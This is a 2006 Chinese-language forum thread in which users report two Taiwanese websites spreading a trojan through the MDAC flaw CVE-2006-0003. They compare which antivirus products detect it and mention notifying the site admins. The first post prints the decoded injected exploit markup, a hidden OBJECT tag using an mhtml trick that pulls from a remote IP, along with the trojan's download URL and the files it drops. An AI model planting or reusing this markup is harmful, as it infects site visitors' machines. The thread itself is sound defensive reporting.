【木馬】77遊樂新世界 及 中央大學遠距教學網被植木馬

[hcchen]

Microsoft Windows MDAC 漏洞 - CVE-2006-0003：

作? ActiveX 數據對象 (ADO) 的一部分提供並在 MDAC 中分發的
RDS.Dataspace ActiveX 控件中存在一個遠程代碼執行漏洞。 成功利用此漏
洞的攻擊者可以完全控制受影響的系統。以下?使用此漏洞通過網頁散播木馬
--------------------------------------------------------------------------
2個網站的木馬來源均指向"中央大學遠距教學網"

語法:

Http://140.115.135.135/magic/_ken/4x6/COMET.Exe

比較特別的是將文件解碼後發現以下的語法:

語法:

<BODY scroll=yes> 
<OBJECT style="DISPLAY: none" type=text/x-scriptlet height=0 width=0 data=mk:@MSITStore:mhtml:c:\.mht!

http://140.115.135.135/magic/_ken/4x6/hepl.txt::/%23%2E%68%74m></OBJECT></BODY>
</html>

木馬植入及相關行為：

下載檔案及位置:

COMET.Exe
C:\Documents and Settings\user\Local Settings\Temporary Internet Files

之後更名轉存:

svchost.Exe
C:\Documents and Settings\user\Local Settings\Temp

自動執行後產生之檔案及位置:
C:\MP.EXE
C:\windows\loados.exe
C:\windows\mcsdos32.dll

造成　explorer.exe　程式錯誤。
造成　drwtsn32.exe　大量偵測及程式錯誤。
2者的錯誤造成幾乎當機的狀態。

其他：未知。

[fq4lxx92]

最近怎麼木馬滿天飛？還有網頁綁架事件層出不窮？

大部分的主流防毒都可測得，惟獨卡巴.....

已傳給卡巴分析（卡巴好像碰到加殼的毒就沒法度）

[DarkSkyline]

http://140.115.135.135/magic/_ken/4x6/COMET.Exe檔案下載後,"AntiVir PersonalEdition Premium" 11/10日病毒碼找到"HEUR/Malware"惡意程式~

77遊樂新世界 -> http://www.77.com.tw/ IE會自動下載 "****snow.exe"檔案,"AntiVir PersonalEdition Premium" 11/10日病毒碼找到"HEUR/Malware"惡意程式~

[hn1271n]

引用:

作者: fq4lxx92

最近怎麼木馬滿天飛？還有網頁綁架事件層出不窮？

大部分的主流防毒都可測得，惟獨卡巴.....

已傳給卡巴分析（卡巴好像碰到加殼的毒就沒法度）

卡巴6.0的脫殼能力是出了名的強

[hcchen]

中獎網站不段攀升，中獎的人數可想而知了。
已經通知那2個網站的網管了。
77遊樂新世界.....已經回函說處理好了。
中央大學遠距教學網.......未知。

本人用的是諾頓2004，目前持續更新中。
諾頓的攔截方式應該是採用"病毒的行為模式"來攔截的。
不過會直接停掉使用中的瀏覽器(開好幾個分頁...一次全部關掉......-..-")。

[harry_chang2003]

11/13
PC-cillin 2007病毒碼:3.919.50

還掃不到

NOD32是靠啟發式引擎掃到的

[BitDefender]

BitDefender Antivirus v10
掃到
COMET.Exe Infected: Generic.Malware.dld!!.2E1E11A9

[haol]

引用:

作者: hcchen

中獎網站不段攀升，中獎的人數可想而知了。
已經通知那2個網站的網管了。
77遊樂新世界.....已經回函說處理好了。

77遊樂新世界似乎又有新貨了top.exe
(ps.還附上網址 )

[BitDefender]

77遊樂新世界有新貨
BitDefender Antivirus v10 掃到....
top.exe
infected with Trojan.Downloader.Small.BCK

[harry_chang2003]

2006-11-16, 晚上9:34分還有病毒嗎?

我開NOD32進去沒掃到